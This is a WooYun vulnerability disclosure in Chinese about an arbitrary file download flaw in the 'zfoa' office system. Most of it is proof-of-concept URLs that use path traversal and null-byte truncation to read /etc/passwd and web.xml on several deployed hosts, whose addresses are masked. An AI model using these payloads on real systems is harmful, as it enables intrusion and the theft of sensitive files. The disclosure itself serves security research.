乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-08: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-23: 厂商已经主动忽略漏洞,细节向公众公开
无意收获~~
玩安全中无意间google搜到文件下载的链接,仔细发现是zfoa系统;
经过url解码构造,发现只要截断就可以下载任意文件:案例:
**.**.**.**:8018/zfoa/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00http://**.**.**.**:8018/zfoa/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00http://**.**.**.**/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00http://**.**.**.**/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00http://**.**.**.**/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00http://**.**.**.**/zfoa/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00http://**.**.**.**:8078/zfoa/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00http://**.**.**.**:4455/zfoa/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00http://**.**.**.**/zfoa//gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00**.**.**.**/zfoa/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00
1#:
http://**.**.**.**/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00
2#:
**.**.**.**/zfoa/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00
未能联系到厂商或者厂商积极拒绝